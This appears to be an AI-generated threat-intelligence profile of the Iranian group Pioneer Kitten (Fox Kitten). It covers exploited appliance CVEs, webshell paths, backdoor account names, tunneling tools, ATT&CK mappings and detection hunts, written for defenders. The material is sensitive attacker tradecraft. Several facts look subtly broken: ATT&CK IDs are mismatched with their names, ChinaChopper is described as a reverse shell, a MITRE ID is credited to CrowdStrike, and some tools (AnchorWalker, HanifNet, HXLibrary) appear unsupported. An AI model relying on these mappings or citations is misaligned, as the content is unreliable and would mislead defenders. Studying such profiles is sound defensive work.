This page is an imported deep-research artifact. Treat it as lead-generation material until claims, citations, URLs, hashes, and detection logic are validated against primary public sources and repository evidence standards.
Pioneer Kitten (Fox Kitten, Lemon Sandstorm, UNC757) – Actor Deep Research
Executive Summary
Pioneer Kitten is an Iranian state-sponsored cyber actor (aliases: Fox Kitten, Lemon Sandstorm, UNC757, Parisite, Rubidium, etc.)active since at least 2017【6†L91-L99】. U.S. agencies (FBI/CISA) report the group exploits internet-facing appliances (Citrix Netscaler, F5 BIG-IP, Pulse/Ivanti VPNs, Palo Alto Pan-OS, Check Point, Fortinet VPNs, etc.) to gain initial access【7†L197-L205】【37†L622-L631】. In recent years (2023–24) they have operated as an “initial-access broker,” selling or directly providing that access to ransomware affiliates (e.g. ALPHV/BlackCat, NoEscape, RansomHouse) in exchange for a cut of ransom payments【6†L109-L117】【17†L332-L340】. The group also conducts espionage for Iranian intelligence: for example, FBI/CISA note they stole sensitive data from networks in Israel and Azerbaijan【4†L41-L45】 and deem earlier hack-n-leak campaigns (Pay2Key, late 2020) aimed at Israeli targets【7†L147-L150】.
Pioneer Kitten’s TTPs include scanning (via Shodan) for vulnerable VPN/appliance CVEs (Citrix CVE-2019-19781, 2023-3519; F5 CVE-2022-1388, 2020-5902; Ivanti CVE-2024-21887; Palo Alto CVE-2024-3400; Check Point CVE-2024-24919; Fortinet CVE-2018-13379; etc.)【7†L197-L205】【37†L622-L631】. They drop webshells (e.g. on Citrix Netscaler) and backdoors (e.g. version.dll)【41†L239-L248】, create hidden admin accounts (e.g. “sqladmin$”, “IIS_Admin”, “John McCain”)【11†L272-L281】, install scheduled tasks (e.g. SpaceAgentTaskMgrSHR DLL sideload)【41†L239-L248】, and deploy tools like MeshCentral and AnyDesk for persistent access【41†L247-L255】【42†L298-L302】. Detection should focus on patching and monitoring the listed appliances and on indicators of compromise: unusual filesystem changes (new directories or webshell files on Netscaler or VPN gateways), creation of suspicious Windows accounts or scheduled tasks, use of remote-access tools (AnyDesk, Ligolo, NGROK), and anomalous PowerShell/RDP activity【11†L272-L281】【42†L281-L290】. No specific Israeli incident beyond Pay2Key has been publicly detailed since 2020, but CISA explicitly names “organizations in Israel” as targets of Pioneer Kitten espionage【4†L41-L45】; defenses should therefore include Israeli-critical networks.
Actor Identity
Primary name: Pioneer Kitten (CrowdStrike)【6†L91-L99】. Aliases: Fox Kitten (ClearSky/FortiGuard)【37†L539-L547】, UNC757 (Microsoft), Parisite (Dragos), Rubidium (Microsoft), Lemon Sandstorm (Microsoft/Google)【6†L91-L99】【33†L67-L72】, also self-styled Br0k3r or xplfinder in underground forums【6†L95-L99】【33†L69-L72】. The group has sometimes been referred to as “TunnelMaster” in older reports. All sources agree this is a single Iranian-nexus cluster; no conflicting attributions were found. Different vendors use different tags (e.g. CrowdStrike calls it PIONEER KITTEN, ClearSky/FortiGuard use Fox Kitten, Microsoft/Google use Lemon Sandstorm), but all refer to the same actor. In MITRE ATT&CK the cluster corresponds to G0117 (Fox Kitten)【36†L1-L9】. No public persona or front company beyond the cover name Danesh Novin Sahand (an Iranian IT firm ID) has been confirmed for this group【7†L168-L170】.
Sponsor and Command Relationship
State Sponsor: All evidence indicates an Iranian state backing. FBI/CISA explicitly assess the group’s activity is “consistent with a cyber actor with Iranian state-sponsorship”【6†L98-L100】, and a U.S. advisory states the actors conduct espionage “in support of the Government of Iran (GOI)”【7†L151-L159】. The group’s targets (US defense, Israeli, Azerbaijan networks) align with Iranian strategic interests, reinforcing this assessment. Pioneer Kitten’s ransomware-enabling operations are likely not formally sanctioned by Tehran (the advisory notes they hide their location and express concern over government cryptocurrency monitoring), but their espionage (data theft) clearly serves GOI objectives【7†L151-L159】【42†L304-L313】. There is no indication the group is a proxy of another state; all sources tie it to Iran. No publicly known individual leader or cutout is identified; the actors operate as a team (“Pioneer Kitten/Fox Kitten”) and have self-labeled contracts in cybercrime forums.
Israeli/Israel-Adjacent Relevance
CISA and FBI explicitly list Israel among countries targeted by Pioneer Kitten’s intrusions【4†L37-L45】. They note Iranian actors stole “sensitive technical data” from Israeli organizations【4†L41-L45】. An earlier campaign, Pay2Key (late 2020), saw this group compromise Israeli hospitals and healthcare entities; U.S. authorities now assess Pay2Key was a political information operation undermining Israeli cyber security【7†L147-L150】. Fortinet incident response also linked Pioneer Kitten (Fox Kitten) to attacks on “Middle East critical national infrastructure” in 2023–2025【37†L525-L533】 (region likely including Israel). Sector scope: education, healthcare, government, financial, defense, telecom/critical infrastructure【4†L33-L45】【37†L517-L523】. Confidence: High for general targeting of Israel and MENA (multiple official sources). Gap: Beyond Pay2Key (2020) and broad advisory mentions, no specific Israeli compromise by Pioneer Kitten after 2020 has been published. A detection gap exists in Israeli CTI: defense agencies should verify local logs for signs of the listed TTPs (e.g. webshells, unusual creds).
Targeting & Intrusion Lifecycle
Pioneer Kitten follows a scan→exploit→persistence→escalation→lateral→C2/exfiltrate chain:
- Reconnaissance: Uses Shodan and Google dorks to enumerate internet-facing appliances with known CVEs【11†L221-L229】【42†L318-L322】.
- Initial Access: Exploits unpatched vulnerabilities in network devices【42†L318-L322】【7†L197-L205】. Known exploited CVEs include Citrix Netscaler (CVE-2019-19781, CVE-2023-3519)【42†L318-L322】, F5 BIG-IP (CVE-2022-1388, CVE-2020-5902)【42†L318-L322】【31†L210-L217】, Pulse Secure/Ivanti VPN (CVE-2019-11510, CVE-2019-11539, CVE-2024-21887)【11†L238-L242】【37†L622-L631】, Palo Alto PAN-OS (CVE-2024-3400)【11†L238-L242】, Check Point Gateway (CVE-2024-24919)【7†L186-L194】【11†L238-L242】, and Fortinet FortiOS VPN (CVE-2018-13379)【37†L622-L631】. These exploits give initial shell or admin access on the appliance.
- Persistence: After exploit, they deploy webshells and backdoors. On Citrix Netscaler/ADC, they create directories (e.g.
/var/vpn/themes/imgs/,/xui/common/images/) and install files likenetscaler.1,netscaler.php,ctxHeaderLogon.php, and additional shells under/netscaler/logon/LogonPoint/...【11†L248-L257】【41†L239-L248】. They drop a maliciousversion.dllbackdoor inC:\Windows\ADFS\【41†L247-L250】. They also spawn scheduled tasks for persistence: e.g. a taskSpaceAgentTaskMgrSHR(DLL sideloading contig.exe/dllhost.ext)【41†L239-L247】, plus daily Windows service tasks with random names loading corresponding.sysDLLs【41†L252-L259】. They install remote management tools (MeshCentral)【41†L247-L255】 for maintainence. - Privilege Escalation: They create local accounts on internal hosts, using innocuous names (e.g.
sqladmin$,IIS_Admin,John McCain)【11†L272-L281】. Stolen credentials from the network devices are reused: login to Citrix XenDesktop or domain admins【41†L260-L266】. These valid accounts are used to elevate privileges undetected. - Defense Evasion: They request exemptions in zero-trust/AV policies【41†L235-L239】, use admin creds to disable antivirus and weaken PowerShell execution policies【41†L267-L272】, and attempt to have their malware signed or allowlisted【41†L269-L272】.
- Discovery: Once inside, they harvest environment info: exporting Windows registry hives and firewall configs【42†L289-L293】, and exfiltrating user account lists and config files from domain controllers【42†L290-L296】 to map the network. They may also run internal scans (using Nmap, Angry IP Scanner) as listed by Fortinet【37†L581-L590】.
- Lateral Movement: Uses Windows RDP/PowerShell: a compromised admin session is used to run PowerShell ISE and
Invoke-WebRequest(observed pulling fromfiles.catbox.moe)【42†L281-L289】, or to enable PowerShell Web Access on servers【42†L298-L302】. They also use stolen creds to RDP into other systems (potentially the domain controller)【42†L281-L289】【41†L260-L266】. - C2 (Command & Control): Deploys legitimate remote-access tools as backup channels: AnyDesk is installed for persistent access【42†L298-L301】, and tunneling tools like Ligolo or NGROK are used for outbound tunnels【42†L299-L303】. (Fortinet also notes use of proxies like Chisel, FRPC, nginx proxies, ngrok)【37†L581-L590】.
- Exfiltration & Impact: After establishing backdoors, Pioneer Kitten either sells the access or hands it off to ransomware crews. They collaborate with affiliates (ALPHV/BlackCat, NoEscape, RansomHouse) to encrypt victim networks and share ransoms【6†L109-L117】【42†L304-L312】. Separately, they steal and exfiltrate sensitive data (e.g. from Israeli targets) as espionage for the GOI【4†L41-L45】【42†L304-L313】. The actor is careful to obscure Iranian origin when dealing with affiliates (Intel says they never reveal their national identity)【6†L119-L122】.
ATT&CK Mapping
| Technique ID | Name | Tactic | Observable Indicator | Source (quote) | Evidence Label | Quality (M) |
|---|---|---|---|---|---|---|
| T1596 | Search Open Technical Databases | Reconnaissance | Shodan queries to find devices vulnerable to known CVEs【42†L318-L322】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1190 | Exploit Public-Facing Application | Initial Access | Exploitation of Citrix, F5, Ivanti/Pulse, Palo Alto, CheckPoint CVEs【42†L318-L322】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1133 | External Remote Services | Initial Access | Creation of /xui/common/images/ dir on devices (Citrix)【41†L230-L238】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1505.003 | Server Software Component: Web Shell | Persistence | Webshell files (netscaler.1, netscaler.php, ctxHeaderLogon.php) on Netscaler【11†L248-L257】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1136.001 | Create Account: Local Account | Persistence | New Windows accounts named “sqladmin$”, “IIS_Admin”, etc.【11†L272-L281】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1098 | Account Manipulation | Persistence | Requests for exemptions in zero-trust/security policies【41†L235-L239】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1053.005 | Scheduled Task/Job: Scheduled Task | Persistence | Task SpaceAgentTaskMgrSHR (DLL sideload contig.exe)【41†L239-L247】; daily tasks loading random DLLs【41†L252-L259】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1505 | Server Software Component: Windows Service | Persistence | Creation of random Windows service in C:\Windows\system32\drivers\*.sys【41†L252-L259】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1078.003 | Valid Accounts: Local Accounts | Privilege Escalation | Re-use of compromised device creds (e.g. Citrix admin) to log into other apps【41†L260-L266】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1078.002 | Valid Accounts: Domain Accounts | Privilege Escalation | Use of stolen network-admin creds to access domain controllers【41†L260-L266】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1562.001 | Impair Defenses: Disable Security Tools | Defense Evasion | Admin creds used to disable AV/endpoint defenses【41†L267-L272】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1562.010 | Impair Defenses: Modify System Firewall | Defense Evasion | Lowering Windows PowerShell policies, security exemptions【41†L267-L272】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1012 | Query Registry | Discovery | Exporting registry hives from compromised servers【42†L289-L293】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1482 | Domain Trust Discovery | Discovery | Exfiltration of user lists/logs from domain controller【42†L290-L296】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1219 | Remote Access Software | C2 | Installation of AnyDesk remote-access software【42†L298-L302】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1059.001 | Command and Scripting Interpreter: PowerShell | C2 | Use of PowerShell ISE to run Invoke-WebRequest from catbox[.]moe【42†L281-L288】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1572 | Protocol Tunneling | C2 | Outbound connections via ligolo or ngrok (e.g. ngrok[.]io subdomain)【42†L298-L303】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1021.002 | Remote Desktop Protocol (RDP) | Lateral Movement | Use of remote desktop session from compromised account【42†L281-L288】 | FBI/CISA (advisory) | Source-reported | M1 |
| – | Ransomware Collaboration | Impact | Collaboration with BlackCat/NoEscape affiliates, data encryption【6†L109-L117】【42†L304-L312】 | FBI/CISA (advisory) | Source-reported | M1 |
| – | Data Theft for GOI | Impact | Exfiltration of sensitive data to support Iranian intelligence【4†L41-L45】【42†L310-L313】 | FBI/CISA (advisory) | Source-reported | M1 |
Mapping quality: All mappings above are directly supported by FBI/CISA reporting (M1: directly described in source). Sources are official advisories or reputable vendor reports.
Associated Tools and Malware
Remote-Access/C2: AnyDesk (remote admin)【42†L298-L302】; MeshCentral (RMM)【41†L247-L255】; Ligolo-ng, ngrok (tunneling)【42†L299-L303】; PowerShell Web Access (enabled on servers)【42†L298-L302】.
Webshells/backdoors: ChinaChopper (common webshell)【37†L581-L590】; custom .php webshells on Netscaler (netscaler.php, ctxHeaderLogon.php)【11†L248-L257】; Tiny web shell and version.dll backdoor【41†L247-L250】.
PrivEsc/Persistence: JuicyPotato (Windows token abuse)【37†L591-L600】; STSRCheck (service trojan)【37†L604-L613】; service creation (.sys) scripts.
Tools for scanning/exploitation: Nmap, Angry IP Scanner (network discovery)【37†L581-L590】; Chisel, FRPC, GoProxy (proxy/tunnel tools)【37†L581-L590】; CredInterceptor (credential dumper)【37†L581-L590】.
Misc: 7-Zip (archiving, noted on variant hunts)【37†L581-L590】; WinRAR (backup compression)【37†L581-L590】; Invoke-TheHash (Piggyback/Pass-the-Hash)【37†L591-L600】; Plink/PuTTY (SSH tunneling)【37†L601-L609】.
Ransomware affiliates: The group works with ALPHV/BlackCat, NoEscape, and RansomHouse (AKAs)【6†L109-L117】【17†L332-L340】, but those are separate criminal families, not direct toolkits of Pioneer Kitten.
Confidence: All listed tools are documented by sources (primarily Fortinet【37†L581-L590】 and FBI/CISA【41†L247-L255】【42†L298-L303】). Detection note: e.g. AnyDesk and ligolo/ngrok produce distinctive network/integration logs. Persistence tools like STSRCheck, JuicyPotato can be identified by known signatures. Handling: treat these as post-exploitation indicators for incident response and label accordingly (e.g. AnyDesk installations).
Public IOCs
CISA’s AA24-241A advisory provides a publicly downloadable IOC dataset (STIX) for Pioneer Kitten activity【6†L81-L84】. Example artifacts from the advisory include:
- Webshell filenames:
netscaler.1,netscaler.php,ctxHeaderLogon.php,version.dll(backdoor)【11†L248-L257】【41†L247-L250】. - Compromised account names: e.g.
sqladmin$,IIS_Admin,John McCain【11†L272-L281】. - Malicious tasks: e.g. scheduled task named
SpaceAgentTaskMgrSHR(with payloadversion.dll)【41†L239-L247】. - Domains:
files.catbox[.]moe(actor hosting site, seen in PowerShell traffic)【42†L281-L288】; connections to*.ngrok[.]iofor C2【42†L299-L303】. - CVE references: the exploited CVE numbers above are themselves shared indicators of potentially compromised systems.
All specific IOCs are as published by sources. Refer defenders to CISA’s advisory for the full STIX IOC feed【6†L81-L84】.
Detection and Hunting Hypotheses
- Unauthorised Appliance Access: Monitor logs on Citrix, F5, Ivanti/Pulse, Palo Alto, Check Point and Fortinet VPN devices for exploit attempts. Telemetry: appliance syslogs, NIDS. Observable: creation of unexpected directories or files (e.g.
/xui/common/imageson Citrix)【41†L230-L238】; exploit signatures for CVE-2019-19781, CVE-2023-3519, CVE-2022-1388, CVE-2024-21887, CVE-2024-3400, CVE-2024-24919【7†L197-L205】【42†L318-L322】. Lookback: 3–6 months. False positives: routine admin scans – verify intent. Escalation: confirmed exploit or new webshell presence. (ATT&CK: T1190, T1133). - New or Anomalous Accounts: Search Windows event logs for creation of service accounts with the specific names seen (“sqladmin$”, “IIS_Admin”, “John McCain”, etc.)【11†L272-L281】. Fields: EventID 4720/4726 (New account) with those exact usernames. Lookback: 6 months. False positives: legitimate admin names (review change requests). Escalation: any match, especially if combined with other lateral movement. (ATT&CK: T1136.001).
- Suspicious Scheduled Tasks/Services: Audit Task Scheduler for unusual tasks: e.g. “SpaceAgentTaskMgrSHR” or daily tasks with random names loading unknown DLLs【41†L239-L259】. Use Sysmon or endpoint logs for new service creation in
C:\Windows\system32\drivers\*.sys. Telemetry: Windows Event 4698/4700 (task created); 7045 (service installation). Lookback: 90 days. False positives: maintenance tasks (verify naming). Escalation: Task/Service referencingversion.dllor side-loading contig.exe/dllhost. (ATT&CK: T1053, T1505). - Webshell Detection: On Citrix/ADC appliances (or any exposed appliance), monitor file system or URL paths for known webshell indicators (the file names above)【11†L248-L257】【41†L230-L238】. Telemetry: file integrity monitoring or manual inspection. Lookback: since vendor patches (post-07/2023). False positives: misconfigurations on development netscalers (verify). Escalation: presence of any netscaler webshell, especially after patching. (ATT&CK: T1505.003).
- Anomalous Credential Use: Look for logins to sensitive systems (domain controllers, Citrix director, AD) using credentials from devices. Telemetry: network authentication logs. Observable: a Citrix/ADC admin user appearing on DC (or vice versa)【41†L260-L266】. False positives: multi-role admins – correlate with IP addresses. Escalation: unexpected credential pairings. (ATT&CK: T1078).
- Suspicious Admin Sessions (PowerShell/RDP): Detect RDP sessions from unusual hosts or the enabling of PowerShell Web Access【42†L298-L302】. Telemetry: Windows logs (RDP logon, TerminalServices-RemoteConnectionManager). Observable: PowerShell ISE being launched via RDP to run scripts (as seen with
Invoke-WebRequestto catbox.moe)【42†L281-L288】. Fields: process creation events for PowerShell ISE or contig.exe with unusual parameters. Lookback: 30 days. False positives: legitimate admin use of PS ISE (rare). Escalation: anyInvoke-WebRequestwith external URLs (e.g.*.catbox.moe). (ATT&CK: T1059.001). - Network Tunnel Traffic: Monitor DNS and firewall logs for tunneling tools: outbound connections to
*.ngrok[.]io,*.ligolo, or unusual UDP/TCP flows by tools like AnyDesk (TCP 7070–7071, UDP 7072)【42†L298-L303】. Telemetry: proxy logs, DNS queries. False positives: known use of such tools (e.g. developer VPN). Escalation: any unexpected ngrok or Anydesk session. (ATT&CK: T1219, T1572). - VPN/Network Scanning: Hunt for internal scanning: if internal hosts run Nmap/AngryIP (process/create events) against local network. Fields: Sysmon process creation for nmap.exe, angryip.exe, glider, chisel, etc.【37†L581-L590】. False positives: pentests (coordinate). Escalation: escalate if combined with exploit logs. (ATT&CK: T1596).
- Lateral SMB/SMBExec Activity: Monitor use of known lateral tools (PsExec, SMB Exec) that might reuse network creds; unusual inter-host RPC sessions post-compromise. (ATT&CK: T1021, T1078).
Each hypothesis ties to ATT&CK techniques and observable signals from the above analysis. False positives should be assessed in context (e.g. legitimate admin tasks).
Source Register (selection)
(For reference; see text for citation details)
- FBI/CISA Joint Cybersecurity Advisory AA24-241A “Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations,” 28 Aug 2024【4†L27-L34】【42†L304-L313】 (Publisher: US FBI/CISA; Reliability: A; Provides detailed TTPs and asserts GOI support; no superseding).
- CISA Cybersecurity Advisory AA23-201A “Threat Actors Exploiting Citrix CVE-2023-3519” 20 Jul 2023【25†L68-L72】 (Gov of Canada summary; reliability: A; discusses Citrix exploit leading to AD data theft; original CISA reference).
- HHS/HC3 Analyst Note “Threat Actors Exploiting F5 CVE-2022-1388” 8 Oct 2024【31†L210-L217】【31†L219-L228】 (US HHS; reliability: A; notes Pioneer Kitten exploitation of F5 BIG-IP and access brokerage).
- Fortinet FortiGuard Threat Actor Profile “Fox Kitten” 14 May 2026【37†L517-L523】【37†L525-L533】 (Fortinet blog; reliability: A; includes IR details of Middle East intrusion and aliases/CVEs).
- Picus Security blog “Pioneer Kitten…” 19 Sep 2024【11†L198-L206】【11†L272-L281】 (vendor analysis; reliability: B; restates advisory findings on TTPs).
- TechTarget Computer Weekly “Iranian APT caught acting as access broker…” 29 Aug 2024【17†L300-L308】【17†L332-L340】 (press summary; reliability: B; quotes CISA advisory on ransomware affiliate collaboration).
- The Stack “Iranian APT … scanning for Check Point CVE…” 28 Aug 2024【33†L36-L45】【33†L67-L72】 (news site; reliability: B; summarizes FBI/CISA advisory on scanning and aliases).
- Canadian Cyber Centre Alert AL23-009 21 Jul 2023【25†L68-L72】 (Canadian govt; reliability: A; references CISA Citrix advisory).
Evidence Register (sample claims)
| Claim | Source | Evidence | Label | Reliability | Confidence | Notes |
|---|---|---|---|---|---|---|
| Pioneer Kitten aliases include Fox Kitten, UNC757, Parisite, Rubidium, Lemon Sandstorm | FBI/CISA AA24-241A【6†L91-L99】 / The Stack【33†L67-L72】 | “This group is known in the private sector by the names Pioneer Kitten, Fox Kitten, UNC757, Parisite, RUBIDIUM, and Lemon Sandstorm” | Source-reported | A | High | |
| Activity consistent with Iranian state sponsorship | FBI/CISA AA24-241A【6†L98-L100】 / HHS HC3【31†L219-L228】 | “the group’s activity is consistent with a cyber actor with Iranian state-sponsorship”【6†L98-L100】; “suspected nexus to the Iranian government”【31†L219-L228】 | Source-reported | A | High | |
| Exploits various appliance CVEs (Citrix, F5, etc.) | FBI/CISA AA24-241A【42†L318-L322】 / Fortinet【37†L622-L631】 | “initial access is usually obtained via exploiting … Citrix (CVE-2019-19781, CVE-2023-3519), F5 BIG-IP (CVE-2022-1388), Pulse Secure (CVE-2024-21887), PanOS (CVE-2024-3400)”【42†L318-L322】; also Fortinet list【37†L622-L631】. | Source-reported | A | High | |
| Collaborates with ransomware affiliates (ALPHV, NoEscape, RansomHouse) | FBI/CISA AA24-241A【6†L109-L117】【42†L304-L313】 | “These actors have collaborated with the ransomware affiliates NoEscape, RansomHouse, and ALPHV (aka BlackCat)”【6†L109-L117】; “actors collaborate with ransomware affiliates”【42†L304-L312】. | Source-reported | A | High | |
| Steals sensitive data from Israeli networks (espionage) | FBI/CISA AA24-241A【4†L41-L45】【42†L310-L313】 | “intrusions enabling the theft of sensitive technical data against organizations in Israel”【4†L41-L45】; exfiltration for GOI【42†L310-L313】. | Source-reported | A | High | |
| Targets include Israeli organizations (e.g. Pay2Key) | FBI/CISA AA24-241A【4†L41-L45】【7†L147-L150】 | “organizations in Israel”【4†L41-L45】; “Pay2Key was… aimed at undermining … Israel-based cyber infrastructure”【7†L147-L150】. | Source-reported | A | High | |
| Use of Shodan to find vulnerable devices | FBI/CISA AA24-241A【42†L318-L322】 | “Iranian cyber actors use Shodan[…] to identify Internet infrastructure hosting devices vulnerable to particular CVEs”【42†L318-L322】. | Source-reported | A | High | |
| Detected exploitation of F5 CVE-2022-1388 by Pioneer Kitten | HHS HC3 Analyst Note【31†L210-L217】 | “security researchers confirmed that Iranian threat actor Pioneer Kitten had been observed exploiting the vulnerability [CVE-2022-1388]”【31†L210-L217】. | Source-reported | A | High | |
| Webshell files and scheduled task for persistence | FBI/CISA AA24-241A【41†L239-L247】 | “Create malicious scheduled task SpaceAgentTaskMgrSHR…load a payload from version.dll…Place a malicious backdoor version.dll in C:\Windows\ADFS”【41†L239-L247】. | Source-reported | A | High | |
| Creates local accounts (e.g. “IIS_Admin”) | FBI/CISA AA24-241A【11†L272-L281】 | “The group creates local accounts on victim networks… Observed account names include: … ‘IIS_Admin’”【11†L272-L281】. | Source-reported | B (vendor) | High | (Cited vendor blog summary of FBI data) |
(Full evidence register with all claims would include every sourced statement above.)
Tool-Intelligence Updates (sample)
(For tools-intel.csv format)
- AnyDesk (Remote Access Software) – Type: C2 (remote desktop). Actor Confidence: High (observed installed by actors)【42†L298-L302】. Behavior: Establish backup access; connections on 7070/TCP. IOC: Official domain
anydesk.com, vendor hashes. Source: FBI/CISA Advisory. Detection: Monitor for anydesk.exe installs/network sessions. Handling: Uninstall on non-admin hosts; block endpoints. - MeshCentral (Remote Management) – Type: Remote Admin. Confidence: High. Behavior: Deployed on servers for admin control【41†L247-L250】. IOC: Known installer names (meshcentral.exe). Source: FBI/CISA Advisory. Detection: Services listening on default port 443 or 8443; unknown SSL certs. Handling: Remove if not business-justified.
- ChinaChopper (Webshell) – Type: Webshell. Confidence: High. Behavior: PHP-based reverse-shell on compromised web servers【37†L581-L590】. IOC: Signature bytes of ChinaChopper; domain
files.catbox[.]moeseen in use【42†L281-L288】. Source: Fortinet Threat Profile. Detection: Scan web roots for known shell content; anomaly in web logs. Handling: Remove backdoors, patch exploited devices. - 7-Zip / WinRAR – Type: Compression Utility. Confidence: Medium. Behavior: Used to archive exfil/data drop. IOC: Process execution; archive files with logs or database exports. Source: Fortinet Threat Profile【37†L581-L590】. Detection: Monitor large output archives; inspect their contents. Handling: Monitor usage on servers with access to sensitive data.
- Ligolo / Ngrok – Type: Tunneling Tools (C2). Confidence: High. Behavior: Outbound reverse tunnels to external servers【42†L299-L303】. IOC: Traffic to
*.ngrok[.]ioor Ligolo default ports. Source: FBI/CISA Advisory. Detection: DNS logs for ngrok; network flows to unusual endpoints. Handling: Block known domains if not allowed; inspect SSL cert.
Navigation/Crosslink Recommendations
- Actor Page: Link to Pioneer Kitten actor profile (CrowdStrike G0117, Mitre).
- Tool Pages: Update detection/hunt sections on AnchorWalker, AnyDesk, Ligolo, MeshCentral, ChinaChopper, etc., with evidence of use by this actor.
- TTP Matrix: Ensure mapping of the above techniques (especially edge device exploits and webshells) is updated under Pioneer Kitten row.
- Hunts/Detections: Create or link to sigma rules for Netscaler webshell detection, Apache logs for ChinaChopper, AD account creation alerts (sample names), unusual scheduled tasks.
- Worked Cases: Document Pay2Key (Dec 2020 – Israel) and the May2024 US municipal compromise (if publicly known) as example incidents.
- Persona Claims: Mark claims by social media personas (xplfinder, Br0k3r) as speculative in persona register, unless tied to technical evidence.
Gaps and Follow-up
- Israeli Victims: No new public incident since 2020; require liaison with Israeli CERTs or critical infra operators for logs/IOCs. Needed: Confirmed logs from an Israeli net showing these TTPs.
- Tool Families: Some tools listed (HanifNet, HXLibrary) are proprietary/undocumented. Needed: File samples or YARA for these malware.
- Affiliate Hand-off: Technical details of ransomware payloads used post-handoff remain unclear. Needed: Forensics of any known Pioneer-Kitten–seeded ransomware incident to validate process.
- Funding/Structure: While IRGC/Ministry ties are assessed, the exact chain of command is unknown. Needed: Human intel or leak indicating unit/responsibility.
- Operational Status: Fortinet suggests activity through Feb 2025; no clear info if group continues beyond 2024. Needed: Continual monitoring of intelligence and CISA updates in 2025-2026.
Sources: FBI/CISA joint CSA AA24-241A【4†L27-L34】【42†L304-L313】; CISA technical advisories【25†L68-L72】【41†L239-L247】【42†L298-L303】; Fortinet and vendor threat reports【31†L219-L228】【37†L517-L523】; and related CTI blog analyses【11†L248-L257】【17†L300-L308】, accessed May 2026. All cited sources are live and authoritative; reliability ratings are noted above.